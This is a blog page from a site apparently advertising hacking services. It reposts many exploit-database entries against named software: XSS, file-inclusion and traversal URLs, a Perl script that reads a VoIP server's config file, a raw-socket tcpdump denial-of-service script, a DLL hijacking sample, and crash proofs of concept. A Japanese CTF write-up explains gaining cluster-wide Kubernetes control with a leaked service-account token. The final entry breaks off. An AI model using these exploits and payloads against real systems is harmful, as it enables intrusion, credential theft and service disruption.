Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863542205

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/55091/info

Mozilla Firefox is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to make the affected computer unresponsive, denying service to legitimate users.

Mozilla Firefox 14.01 is affected; prior versions may also be affected. 

<html>
<head>
<title></title>
</head>
<body></body>
<script>
function e(x)
{
  document.body.innerHTML += x;
  e(x + 'x');
};

e('x')
</script>
</html>
HireHackking 
source: https://www.securityfocus.com/bid/55082/info

LISTSERV is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

LISTSERV 16 is vulnerable; other versions may also be affected. 

http://www.example.com/SCRIPTS/WA.EXE?SHOWTPL=<script>alert(document.cookie)</script>
HireHackking 
source: https://www.securityfocus.com/bid/54991/info

MindTouch DekiWiki is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary server-side script code that resides on an affected computer or in a remote location with the privileges of the web server process. This may facilitate unauthorized access.

MindTouch DekiWiki 10.1.3 is vulnerable; other versions may also be affected. 

http://www.example.com/deki/web/deki/gui/link.php?IP=http://www.example.com/shell.txt?
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?IP=http://www.example.com/shell.txt?
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=http://www.example.com/shell.txt?
http://www.example.com/deki/web/deki/gui/link.php?IP=../../../../../../../../../windows/win.ini%00
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?IP=../../../../../../../../../windows/win.ini%00
http://www.example.com/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=../../../../../../../../../windows/win.ini%00
HireHackking 
source: https://www.securityfocus.com/bid/54992/info

GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host are prone to a local file-include vulnerability because they fail to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 

For GalaxyScripts Mini File Host:

http://www.example.com/MFH/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg

For DaddyScripts Daddy's File Host:

http://www.example.com/dfh/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg
HireHackking 
source: https://www.securityfocus.com/bid/55062/info

The ShopperPress WordPress theme is prone to an SQL-injection and multiple cross-site vulnerabilities because it fails to properly sanitize user-supplied input.

Successful exploits will allow an attacker to steal cookie-based authentication credentials, to compromise the application, to access or modify data, or to exploit latent vulnerabilities in the underlying database.

ShopperPress 2.7 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-admin/admin.php?page=images&p=0&search=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C

http://www.example.com/wp-admin/admin.php?page=emails&edit=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C

http://www.example.com/wp-admin/admin.php?page=members&edit&order=0%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C

http://www.example.com/wp-admin/admin.php?page=orders&id=5-261343282-1%27union select[SQL-INJECTION!]--
HireHackking 
source: https://www.securityfocus.com/bid/55078/info

Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.

Elastix 2.2.0 is vulnerable; other versions may also be affected. 

#!/usr/bin/perl -w

#------------------------------------------------------------------------------------# 
#Elastix is an Open Source Sofware to establish Unified Communications. 
#About this concept, Elastix goal is to incorporate all the communication alternatives,
#available at an enterprise level, into a unique solution.
#------------------------------------------------------------------------------------#
############################################################
# Exploit Title: Elastix 2.2.0 LFI
# Google Dork: :(
# Author: cheki
# Version:Elastix 2.2.0
# Tested on: multiple
# CVE : notyet
# romanc-_-eyes ;) 
# Discovered by romanc-_-eyes
# vendor http://www.elastix.org/

print "\t Elastix 2.2.0 LFI Exploit \n";
print "\t code author cheki   \n";
print "\t 0day Elastix 2.2.0  \n";
print "\t email: anonymous17hacker{}gmail.com \n";

#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

use LWP::UserAgent;
print "\n Target: https://ip ";
chomp(my $target=<STDIN>);
$dir="vtigercrm";
$poc="current_language";
$etc="etc";
$jump="../../../../../../../..//";
$test="amportal.conf%00";

$code = LWP::UserAgent->new() or die "inicializacia brauzeris\n";
$code->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&module=Accounts&action";
$res = $code->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~ 'This file is part of FreePBX') {
 
print "\n read amportal.conf file : $answer \n\n";
print " successful read\n";
 
}
else { 
print "\n[-] not successful\n";
	}
HireHackking 
source: https://www.securityfocus.com/bid/54989/info

mIRC is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/projects.php?go=maddons&offset=&order=id&sort=desc&mver=0&keywords=xss"><img src=x onerror=prompt(document.cookie);>
HireHackking 
source: https://www.securityfocus.com/bid/54985/info

Total Shop UK eCommerce CodeIgniter is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

CodeIgniter 2.1.2 is vulnerable; other versions may also be affected. 

Example 1 Request: +----------------- GET /?%00";};alert(String.fromCharCode(120,115,115,116,101,115,116 ));{//=1 HTTP/1.1 Host: www.example.com Referer: http://www.example.com/about --- Example 1 Response: +------------------ --- SNIP --- function refresh_page(){ parent.location="/?%00";};alert(String.fromCharCode(120,115,115 ,116,101,115,116));{//=1";
HireHackking 
Document Title:
===============
Airdroid iOS, Android & Win 3.1.3 - Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1543


Release Date:
=============
2015-07-20


Vulnerability Laboratory ID (VL-ID):
====================================
1543


Common Vulnerability Scoring System:
====================================
3.9


Product & Service Introduction:
===============================
AirDroid allows you to access wirelessly and for free on your Android phone or tablet from Windows, Mac or the Internet, and to control it.

(Copy of the Product Homepage: https://www.airdroid.com/de/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered an application-side input validation web vulnerability in the official SandStudio AirDroid (windows, ios and android) mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2015-07-05: Researcher Notification & Coordination (Hadji Samir)
2015-07-06: Vendor Notification (Security Team)
2015-07-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Sand Studio
Product: AirDroid iOS Application (Andoird, Windows, MacOS & Web) 3.1.3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered  in the official SandStudio AirDroid (windows, ios and android) mobile web-application.
The vulnerability allows remote attacker or low privilege user accounts to inject malicious codes to the application-side of the affected mobile web-application.

The vulnerability is located in the send messages and the send message with an attached file  module. Remote attackers with low privilege user account are able to upload file name 
with malicious strings like ``><script>alert(1).txt. On the arrival inbox occurs the execution of the malicious code that compromises the other target system/device user account.
The vulnerability is located on the application-side and the request method to inject is POST.

The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.9.
Exploitation of the application-side web vulnerability requires a low privilege web-application user account and low user interaction.
Successful exploitation of the vulnerabilities results in persistent phishing mails, session hijacking, persistent external redirect to malicious 
sources and application-side manipulation of affected or connected module context.

Request Method(s):
						[+] POST

Vulnerable Module(s):
						[+] Send Message

Vulnerable Parameter(s):
						[+] filename

Affected Module(s):
						[+] Message Inbox


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with low privilege application user account and low user interaction (click).
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC:
<span class="name">"><"><script>alert(document.cookie).txt< span="">[PERSISTENT INJECTED SCRIPT CODE]
    <span class="progress-rate">100%</span>
    <a class="attach-del-icon"></a>
</scrip...txt<></span>


--- PoC Session Logs [POST] ---
11:13:00.993[0ms][total 0ms] Status: pending[]
POST https://upload.airdroid.com/sms/attachment/?fn=%22%3E%3Cscript%3Ealert(document.cookie).txt&d=&after=0&rtype=0&origin=http%3A%2F%2Fweb.airdroid.com&country=DZ&fname=%22%3E%3Cscript%3Ealert(document.cookie).txt 
Load Flags[LOAD_BYPASS_CACHE  ] Content Size[unknown] Mime Type[unknown]
   Request Headers:
      Host[upload.airdroid.com]
      User-Agent[Mozilla/5.0 (X11; Linux i686; rv:39.0) Gecko/20100101 Firefox/39.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
      Content-Type[application/octet-stream]
      Referer[http://web.airdroid.com/]
      Content-Length[5281]
      Origin[http://web.airdroid.com]
      Cookie[_SESSION=0b484eb230f27c004a7e990bace6175a416b58ed-%00_TS%3A1438769709%00; _ga=GA1.2.1046706455.1436177514; _gat=1; account_sid=c51d21b583ce76c04c8d4fa5a5c7496e; account_info=aW5mby5kaW1hbmV0QGdtYWlsLmNvbQ%3D%3D%2C63b971b729a756a3c1eb0fec6cccb736%2C9731220%2C59fd7af875fa5434a86e5397c79380d2]
   Post Data:
      POST_DATA[-PNG
	  
Note: We demonstrated the poc by usage of the web-app but the local app is also vulnerable to the same issue!


Solution - Fix & Patch:
=======================
The vulnerbaility can be patched by a secure parse and encode of the vulnerable filename value in the send message module with the attach file function.


Security Risk:
==============
The security risk of the application-side input validation web vulnerability in the airdroid app is estimated as medium. (CVSS 3.9)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [samir@evolution-sec.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking 
# Exploit Title: TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service
# Date: 7.18.2015
# Exploit Author: Luke Arntson arntsonl@gmail.com
# Vendor Homepage: http://www.tcpdump.org/
# Software Link: http://www.tcpdump.org/
# Version: 4.6.2, 4.5.1, 4.4.0
# Tested on: Lubuntu 14.04 64-bit
# CVE : CVE-2015-2153
 
# Note: tcpdump must be running in verbose mode for this Denial-of-Service to trigger.
 
import socket, sys
from struct import *
 
def checksum(msg):
    s = 0
    for i in range(0, len(msg), 2):
        w = ord(msg[i]) + (ord(msg[i+1]) << 8 )
        s = s + w
    s = (s>>16) + (s & 0xffff);
    s = s + (s >> 16);
    s = ~s & 0xffff
    return s

if len(sys.argv) != 3:
    print "Usage: ./CVE-2015-2153.py <source-ip> <destination-ip>"
    exit()

# fake the source and destination
source_ip = sys.argv[1]
dest_ip = sys.argv[2]
	
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
except socket.error , msg:
    print 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
    sys.exit()
   
packet = ''

# ip header fields
ip_ihl = 5
ip_ver = 4
ip_tos = 0
ip_tot_len = 0  # kernel will fill the correct total length
ip_id = 54321   #Id of this packet
ip_frag_off = 0
ip_ttl = 255
ip_proto = socket.IPPROTO_TCP
ip_check = 0    # kernel will fill the correct checksum
ip_saddr = socket.inet_aton ( source_ip )   #Spoof the source ip address if you want to
ip_daddr = socket.inet_aton ( dest_ip )
 
ip_ihl_ver = (ip_ver << 4) + ip_ihl
 
ip_header = pack('!BBHHHBBH4s4s' , ip_ihl_ver, ip_tos, ip_tot_len, ip_id, ip_frag_off, ip_ttl, ip_proto, ip_check, ip_saddr, ip_daddr)
 
# tcp header fields
tcp_source = 255   # source port
tcp_dest = 323   # destination port
tcp_seq = 454
tcp_ack_seq = 0
tcp_doff = 5    #4 bit field, size of tcp header, 5 * 4 = 20 bytes
#tcp flags
tcp_fin = 0
tcp_syn = 1
tcp_rst = 0
tcp_psh = 0
tcp_ack = 0
tcp_urg = 0
tcp_window = socket.htons (5840)    #   maximum allowed window size
tcp_check = 0
tcp_urg_ptr = 0
 
tcp_offset_res = (tcp_doff << 4) + 0
tcp_flags = tcp_fin + (tcp_syn << 1) + (tcp_rst << 2) + (tcp_psh <<3) + (tcp_ack << 4) + (tcp_urg << 5)
 
tcp_header = pack('!HHLLBBHHH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags,  tcp_window, tcp_check, tcp_urg_ptr)

# CVE-2015-2153 out-of-bounds occurs here, when we send in a bad message length to the error type.
# The RPKI pdu looks like the following
# [ pdu version ] [ pdu type ] [ error id ] [ packet length ] [ encapsulated pdu length ] [ message length ] [ message ]
# by giving message length a long value, we cause the buffer to write into bad memory
error_pdu = '\x41' # fake version
error_pdu = error_pdu + '\x0A' # error type
error_pdu = error_pdu + '\x00\x01' # error number
error_pdu = error_pdu + '\x00\x00\x00\x08' # must be less than or equal to total packet length
error_pdu = error_pdu + '\x00\x00\x00\x00' # no encapsulated pdu
error_pdu = error_pdu + '\x7F\xFF\xFF\xFF' # overwrite out-of-bounds '\0', causing DoS
error_pdu = error_pdu + 'AAAA' # fake message

user_data = error_pdu

# pseudo header fields
source_address = socket.inet_aton( source_ip )
dest_address = socket.inet_aton(dest_ip)
placeholder = 0
protocol = socket.IPPROTO_TCP
tcp_length = len(tcp_header) + len(user_data)
 
psh = pack('!4s4sBBH' , source_address , dest_address , placeholder , protocol , tcp_length);
psh = psh + tcp_header + user_data;
 
tcp_check = checksum(psh)

# make the tcp header again and fill the correct checksum - remember checksum is NOT in network byte order
tcp_header = pack('!HHLLBBH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags,  tcp_window) + pack('H' , tcp_check) + pack('!H' , tcp_urg_ptr)
 
# final full packet - syn packets dont have any data
packet = ip_header + tcp_header + user_data
 
#Send the packet finally - the port specified has no effect
s.sendto(packet, (dest_ip , 0 ))    # put this in a loop if you want to flood the target
HireHackking 
#!/usr/bin/perl -w
# Title : Image Transfer IOS - Remote Crash Proof Of Concept
# Affected Versions: All Version
# Tested on IOS 8.4 (12h143) / 2.0
# Itunes link : https://itunes.apple.com/us/app/image-transfer-photo-video/id588696602?mt=8
#
# EDB note: Might require to be run multiple times to cause DoS
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/mohammadreza.espargham
#


system(($^O eq 'MSWin32') ? 'cls' : 'clear');

use threads;
use LWP::UserAgent;


print "    Mohammad Reza Espargham\n   www.reza.es\n\n     Syntax: perl poc.pl 192.168.1.3\n\n";


$port=8080; #port
$host=$ARGV[0]; #host


sub check_app {   #thread sub
        my $ua = LWP::UserAgent->new();
        $ua = new LWP::UserAgent(agent => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5");
        $ua -> timeout(10);
        print "*";
        $ua->get("http://$host:$port/?__debugger__=yes&cmd=resource&f=debugger.js");
        return 0;
}

my @threads;
for (my $i = 0; $i < 20; $i++) {
    my $thread = threads->create(\&check_app);
    push(@threads, $thread);
}
foreach (@threads) { #join
    $_->join();
}
HireHackking 
# phpVibe < 4.20 Stored XSS

# Vendor Homepage: http://www.phpvibe.com
# Affected Versions: prior to 4.20

# Discovered by Filippos Mastrogiannis
# Twitter: @filipposmastro
# LinkedIn: https://www.linkedin.com/pub/filippos-mastrogiannis/68/132/177

-- Description --

This stored XSS vulnerability allows any logged in user
to inject malicious code in the comments section:
e.g. "><body onLoad=confirm("XSS")>

The vulnerability exists because the user input is not properly sanitized
and this can lead to malicious code injection that will be executed on the
target’s browser

-- Proof of Concept --

1. The attacker posts a new comment which contains our payload:
"><body onLoad=confirm("XSS")>

2. The stored XSS can be triggered when any user visits the link of the
uploaded content

-- Solution --

The vendor has fixed the issue in the version 4.21
HireHackking 
Exploit Title: Microsoft Word Local Machine Zone Remote Code Execution Vulnerability
Date: July 15th, 2015
Exploit Author: Eduardo Braun Prado
Vendor Homepage : http://www.microsoft.com
Version: 2007
Tested on: Microsoft Windows  XP, 2003, Vista, 2008, 7, 8, 8.1
CVE: 	CVE-2015-0097

Original Advisory: https://technet.microsoft.com/library/security/ms15-022

Microsoft Word, Excel and Powerpoint 2007 contains a remote code execution vulnerability because it is possible 
to reference documents such as Works document (.wps) as HTML. It will process HTML and script code in the context 
of the local machine zone of Internet Explorer which leads to arbitrary code execution. 
By persuading users into opening eg. specially crafted .WPS, ".doc ", ".RTF " (with a space at the end) 
it is possible to triggerthe vulnerability and run arbitrary code in the context of the logged on Windows user.

Exploit code here :

https://onedrive.live.com/embed?cid=412A36B6D0A9436A&resid=412A36B6D0A9436A%21156&authkey=AA_JVoZcoM5kvOc
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37657.zip
HireHackking 
source: https://www.securityfocus.com/bid/55189/info

PHP Web Scripts Ad Manager Pro is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.

Ad Manager Pro version 4.0 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
HireHackking 
// source: https://www.securityfocus.com/bid/55179/info

Adobe Pixel Bender Toolkit2 is prone to multiple vulnerabilities that allow attackers execute arbitrary code.

An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. 

#include <windows.h>
#define DllExport __declspec (dllexport)

DllExport void hook_startup() { exp(); }

int exp()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}
HireHackking 
source: https://www.securityfocus.com/bid/55175/info

The Monsters Editor for the WP Super Edit plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

http://www.example.com/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html

http://www.example.com/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
HireHackking 
source: https://www.securityfocus.com/bid/55174/info

The Rich WidgetPlugin for WordPress is prone to an arbitrary file-upload vulnerability.

An attacker can exploit this issue to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. 

http://www.example.com/wp-content/plugins/rich-widget/fckeditor/editor/filemanager/connectors/test.html
HireHackking 
source: https://www.securityfocus.com/bid/55172/info

KindEditor is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

KindEditor versions 4.1.2 and 4.0.6 are vulnerable; other versions may also be affected. 

http://www.example.com/kindeditor/index.php?name=<pre><script>alert('XSS');</script>by ZSL!</pre>
HireHackking

序文

最近、私はクラウドセキュリティに非常に興味があります。 K8Sのアーキテクチャと運用を学びました。私はたまたまこのHuawei Cloudのゲームに遭遇し、多くを獲得しました。

(プラットフォーム問題クラスターの最高の権限でさえ、予期しない期待を通じて得られました)。

0x00質問入りの発見

質問があり、IAASサービスの提供に似たサイトであることがわかりました。ディレクトリの波をスキャンして、いくつかのファイルとルート:を見つけました

phpinfo.php

robots.txt

admin/

ログイン/

静的/奇妙なことは、PHPINFOが存在する環境でBeegoフレームワークバックエンドの403インターフェイスが見つかったことです。

image-20201220213938432予備的な推測では、phpファイルは処理のためにnginx fastcgiに引き渡され、他のルートは処理のためにbeegoに引き渡されます。

次に、最初に /管理者ルートを見て、隠されたフォームがあることがわかります

image-20201220142429113したがって、私は当然、Burpsuiteを使用して弱いパスワードを爆破することを考え、パスワードadmin:Adminが弱いことを発見しました

ログインが成功した後、2つのURLが返され、tools.zipをダウンロードし、名前/wsproxyに基づいて推測はWebsocketのプロキシルートです。ツールのソースコードを見ると、Wsproxyクライアントプログラムであることがわかります。

image-20201220142540954この時点で、イントラネットに入るチャネルを見つけました。

0x01 wsproxyイントラネットを入力

クライアント接続プログラムを取得するために取得したツールソースコードを直接コンパイル

image-20201220193029128使用の指示によると、単純なコマンドを介してタイトルのwsproxyに接続でき、パスワードはツールソースコードディレクトリのpass.txt(uaf)です。セッションは、管理者にログインした後の質問で与えられたBeegoセッションです。

image-20201220193124576これにより、ローカルポート1080にSocks5プロキシが開きます。このプロキシを通じて、イントラネットに接続できます。

0x02 PHPINFO LEAKS K8Sクラスター情報

この質問クラウドの名前と、PHPINFO.PHP環境変数に見られる大量のサービス情報とK8S APIサーバーアドレスのため、これは環境変数の名前と値に応じたK8Sクラスターです。そして、私たちの質問は、K8Sクラスターのポッドに属します。

image-20201220142706608

0x03 K8Sインフラストラクチャの紹介

より深く進み続ける前に、K8Sのインフラストラクチャの一部を理解する必要があります

architecture上の図に示すように、Kubernetesクラスターは主に2つの部分に分割されていることがわかります:マスターとノードは、典型的な分散アーキテクチャでもあります。

まず、外部アプリケーションは、APIサーバーが提供するHTTPインターフェイスを介してマスターと対話し、APIと対話する前に、認証の段階を通過する必要があります。ノードは複数のポッドで構成され、ポッドはコンテナ(通常はドッカーズ)を実行し、記述されたサービス(アプリ)はこれらのポッドのコンテナで実行されます。

第二に、ポッドを公開して公開したい場合は、サービスを理解する必要があります。ポッドのセットで実行されているアプリケーションをネットワークサービスとして公開する抽象的な方法をサービスと呼びます。サービスは通常、公開される可能性のあるIPアドレス、ポートマッピング関係などで構成されています。サービスを通じて、対応するポッドにアクセスできます。

各ノードには、ノードエージェントと呼ばれるプログラムKubeletがあります。ノードは、このプログラムを通じてAPI-Serverにノード情報を報告し、対応する命令を受け入れます。

上記のアーキテクチャから、クラスター全体を外側から削除したい場合、実際に露出したAPIサーバーが提供するREST APIへのアクセスを取得する必要があることを確認するのは難しくありません。

0x04 K8S認証トークンリーク +不適切な構成

上記のステップを通じて、K8Sのインフラストラクチャを引き続き調べることができます。

指定されたエージェントを介してイントラネットに接続し、K8S API-Serverhttps://10.247.0.1:443にアクセスしました。 APIサーバーは、エージェントが直接アクセスできるネットワークセグメントにさらされていることがわかりましたが、直接アクセスにより401が許可されていないことを促したため、この認証に合格する可能性のある方法を見つける必要があります。

image-20201220142743378 phpinfo.phpファイルのコンテンツによると、多くのサービスがクラスターに展開されているため、すべての問題コンテナはこのK8を介して調整および管理する必要があると推測します。

同時に、K8Sクラスターを展開するとき、トークンファイルは、デフォルトで各PoDコンテナの/run/secrets/kubernetes.io/serviceaccount/tokenに取り付けられます。

ファイルでは、他の質問から得られるシェルからこのトークンを取得できます。

ServiceAcCountには、主に3つのコンテンツが含まれています。名前空間、トークン、CA。名前空間は、ポッドが配置されている名前空間を指定し、CAはApiserverの証明書を検証するために使用され、トークンは認証として使用されます。それらはすべてマウントを介してポッドファイルシステムに保存されます。トークンによって保存されたパスは/var/run/secrets/kubernetes.io/serviceaccount/tokenです。

以前にWebShell_1の質問で取得したWebシェルを介してAPI-Server認証トークンを取得し、API-Server認証トークンを取得できます。

http://124.70.199.12336032003/UPLOAD/71A6E9B8-90B6-4D4F-9ACD-BD91C8BBCC5E.JSP? APIサーバーへのアクセスを取得しているため、K8Sクラスターでマスターアクセス許可を取得するのと同等です。

0x05クラスター操作許可を取得

APIサーバーの許可を得た後、私たちは私たちが望むようにクラスターで欲しいことをすることができます〜実際には、これを行うとき、これはこの問題に対する予想される解決策ではなく、プラットフォームの脆弱性であるべきであることに気付くでしょう。マスター許可を取得した後、すべてのポッド(Web質問)を表示/制御し、自由に必要な質問のフラグを取得できるためです。

コマンドラインツールKubectlを使用して、APIサーバーで操作できます。

k8s.yaml構成ファイルを作成します。次のように、トークンは上記のトークンであり、サーバーはAPIサーバーアドレスに記入します

Apiversion: V1

Clusters:

-Cluster:

Insecure-Skip-TLS-Verify: True

Server: https://10.247.0.1

name: cluster-name

コンテキスト:

-Context:

cluster: cluster-name

namespace:テスト

user:管理者

name: admin

Current-Context: admin

Kind: config

fearences: {}

users3360

-name: admin

user:

token: eyjhbgcioijsuzi1niisimtpzci6iij99.eyjpc3mioijrdwjlcm5zl3nlcnzpy2vy2nvdw50iwia3vizxjuzxrlcy5pby9zzxj2 awnlywnjb3vudc9uyw1lc3bhy2uioijkzwzhdwx0iwia3vizxjuzxrcy5pby9zzxj2awnlywnjb3vudc9zzwnyzxqubmftzsi6imrlz mf1bhqtdg9rzw4tbdh4ogiilcjrdwjlcm5ldgvzlmlvl3nlcnzpy2vhy2nvdw50l3nlcnzpy2utywnjb3vudc5uyw1lijoizgvmyxvsdc isimt1ymvybmv0zxmuaw8vc2vydmljzwfjy291bnqvc2vydmljzs1hy2nvdw50lnvpzci6ijziytqzn2jkltlhn2etnge0zs1iztk2ltky mjkymmzhnmziocisinn1yii6inn5c3rbtpzzj2awnlywnjb3vuddpkzwzhdwx0omrlzmf1bhqifq.xdrzlt7eemvltqbxnzb2rfwgtr 4DPVKCPP5SFTWTWTFGVUUDVDIOXGYTQIP_LQIVOLVTOPEAMBOAECP8FTSVKWMSOLYNHI5HFY6ZRTTB6DKP0VRL70PWPEVOSFFOI0EJ_NN pnjy3wxkcw5ug9j9j9uzdmw28z-crlhoiwknw-ae4op6bnrbid-l1y3nmyngoxi2aan9uud9m6bh__y8pvxg2ex9b4_fdom8wu9evfvl ya502__xgmcz

HireHackking 
#!/⁠usr/⁠bin/⁠env python
# Title : Internet Download Manager -⁠ Crash Proof Of Concept
# Affected Versions: All Version
# Founder : InternetDownloadManager
# Tested on Windows 7 /⁠ Server 2008
#
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-⁠Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/mohammadreza.espargham
#
#
# downlWithIDM64.dll Exploit
#
#
# 1 . run python code : python crash.py
# 2 . open r3z4.txt and copy content to clipboard
# 3 . open "IDM"
# 4 . From Menu , Downloads -⁠-⁠> Find
# 5 . Paste ClipBoard on "File name or part of the name"
# 6 . Click Find
# 7 . Crashed ;)


crash = "\x41"*10000 #B0F
file = open("r3z4.txt", "w")
file.write(crash)
file.close()
HireHackking 
SOPlanning - Simple Online Planning Tool multiple vulnerabilities

CVEs: CVE-2014-8673, CVE-2014-8674, CVE-2014-8675, CVE-2014-8676, CVE-2014-8677

Vendor: http://www.soplanning.org/
Product: SOPlanning - Simple Online Planning
Version affected: 1.32 and prior

Product description:
